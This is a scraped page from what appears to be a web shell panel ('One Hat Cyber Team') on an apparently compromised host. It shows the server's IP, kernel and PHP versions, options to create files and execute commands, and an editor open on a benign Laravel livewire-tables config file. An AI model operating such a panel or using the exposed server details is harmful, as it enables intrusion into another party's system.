⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.138
Server IP:
186.226.58.36
Server:
Linux da02.sh15.net 3.10.0-1160.119.1.vz7.224.4 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Server Software:
Apache/2
PHP Version:
8.1.32
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
redesystem
/
public_html
/
sys
/
config
/
Edit File: livewire-tables.php
'bootstrap-5', /** * Filter Frontend Asset Options */ /** * Cache Rappasoft Frontend Assets */ 'cache_assets' => false, /** * Enable or Disable automatic injection of core assets */ 'inject_core_assets_enabled' => true, /** * Enable or Disable automatic injection of third-party assets */ 'inject_third_party_assets_enabled' => true, /** * Enable Blade Directives (Not required if automatically injecting or using bundler approaches) */ 'enable_blade_directives' => true, /** * Customise Script & Styles Paths */ 'script_base_path' => '/rappasoft/laravel-livewire-tables', /** * Filter Default Configuration Options * * */ /** * Configuration options for DateFilter */ 'dateFilter' => [ 'defaultConfig' => [ 'format' => 'Y-m-d', 'pillFormat' => 'd M Y', // Used to display in the Filter Pills ], ], /** * Configuration options for DateTimeFilter */ 'dateTimeFilter' => [ 'defaultConfig' => [ 'format' => 'Y-m-d\TH:i', 'pillFormat' => 'd M Y - H:i', // Used to display in the Filter Pills ], ], /** * Configuration options for DateRangeFilter */ 'dateRange' => [ 'defaultOptions' => [], 'defaultConfig' => [ 'allowInput' => true, // Allow manual input of dates 'altFormat' => 'F j, Y', // Date format that will be displayed once selected 'ariaDateFormat' => 'F j, Y', // An aria-friendly date format 'dateFormat' => 'Y-m-d', // Date format that will be received by the filter 'earliestDate' => null, // The earliest acceptable date 'latestDate' => null, // The latest acceptable date ], ], /** * Configuration options for NumberRangeFilter */ 'numberRange' => [ 'defaultOptions' => [ 'min' => 0, // The default start value 'max' => 100, // The default end value ], 'defaultConfig' => [ 'minRange' => 0, // The minimum possible value 'maxRange' => 100, // The maximum possible value 'suffix' => '', // A suffix to append to the values when displayed ], ], /** * Configuration options for SelectFilter */ 'selectFilter' => [ 'defaultOptions' => [], 'defaultConfig' => [], ], /** * Configuration options for MultiSelectFilter */ 'multiSelectFilter' => [ 'defaultOptions' => [], 'defaultConfig' => [], ], /** * Configuration options for MultiSelectFilter */ 'multiSelectDropdownFilter' => [ 'defaultOptions' => [], 'defaultConfig' => [], ], ];
Simpan